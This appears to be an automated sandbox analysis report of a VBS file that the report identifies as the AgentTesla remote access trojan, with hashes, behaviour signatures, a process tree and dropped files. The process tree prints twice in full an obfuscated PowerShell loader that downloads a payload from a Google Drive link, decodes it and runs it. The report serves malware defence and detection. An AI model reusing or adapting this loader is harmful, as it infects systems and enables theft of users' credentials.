Analysis

  • max time kernel
    147s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240611-en locale:en-us os:windows7-x64 system
  • submitted
    18-06-2024 09:36

General

  • Target

    STS_Bunker_00617.vbs

  • Size

    92KB

  • MD5

    dfe2a23100ac3263583e69f48e9b32e6

  • SHA1

    20087641aba69eaaaef0f87a7d21edd8a255db60

  • SHA256

    9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957

  • SHA512

    48b5bf8605415ead17d375adc9613b73f8e3f80132086f2a3ef11df7684e1d43ad4f97aee65967986a9964d81edcd7043d7faaf720fcd1f73052411d43153038

  • SSDEEP

    1536:V01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5eW8VLOExkzL:V09LB0DnWzhX7RXaSMxhxsAhWEwhrdMh

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses a powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . 
LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb 
S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. 
MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb 
UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme 
tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
        3⤵
          PID:1604
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . 
LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb 
S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. 
MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb 
UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme 
tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
            4⤵
              PID:2700
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:596

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        2KB

        MD5

        42f4cdaff599bf751294f7772ef38470

        SHA1

        22d0b54450fb80f14860ffa415c5d0b2d1074a3b

        SHA256

        2a8488b7b6eb1ce9702c196531a0335c9b399960f5d0d3f6892f87ef6d3f743a

        SHA512

        45edd484ada632eba0d48a716a591d975f9ad6d414faa6a996e09f810d06a5234d2dcd28ff49e3b8e96133e815f86e681f66b66cdb648461f8ce6a53b056a74c

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        3KB

        MD5

        ea02db7340e3f6e6b8e17308b6557be3

        SHA1

        4dded0ce59ba5daea1945ed6c818139aaf87478d

        SHA256

        7dce804a8697a14a7a3f373b752d8c27cfae9f594620cfb5b67a362d5f227a33

        SHA512

        45a1658ad9fb86ca758d384a875886bee1ffa77109a71a99db4f33198d53374c75f1093549d9b55c5f6830f04657a6ff2af1519ddadff6511298acced105f683

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        3KB

        MD5

        a0ffdcd45250b56ef7b6ece47dfaa18f

        SHA1

        af5079167ca7e43f73a3a65524016e12bd10b74e

        SHA256

        c72d2de94bcaf6f0b0413ea1457702e325285db25a33ad9e7a6c964fedc8cf43

        SHA512

        40d8db37fd09f130d8defa2f904b9521cd85b5f565ecbf9639c4f54d33f2fc5c5a8aea41e30a792837da60a3c224935c704c3b9daa441d0f47a798c443a038ec

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        4KB

        MD5

        2ac0d2e4dc51e1a2fac93883f392047d

        SHA1

        4b602734b7f0e8736f1687005362013ecf6adb7f

        SHA256

        d8aa74f29b5249196b19533d26963b3c5720f984c789ba88fa0ea7c84d4c1191

        SHA512

        02b0e47673ca66dba9c531108c91c1747e788e49140b9bc0f5a90635e4c2276a75a2b2ff35ad54f0bb34220f7233f2c1606e9f6e8b0c282e14201c4536a39ba3

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        1KB

        MD5

        ba9563f04617a88e57e8c5570fafa1f6

        SHA1

        16ccd5c12c2e93fccb354bf4655f624748cbc1f1

        SHA256

        273e078cfaa142cddf150b1bfc6787fb1db78532c0ab65e1a07b28c6e939c51b

        SHA512

        e86be586b76800ee0439d496a8529198048d14a5d57134c9569364e4022d9639214ec9f53ba8f7ae1a0c558a65b2539d116c205e7ffb1a5dedbb9b8c0cc5965e

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        2KB

        MD5

        dd21f671dea68ac7cd8bf939d4eeda94

        SHA1

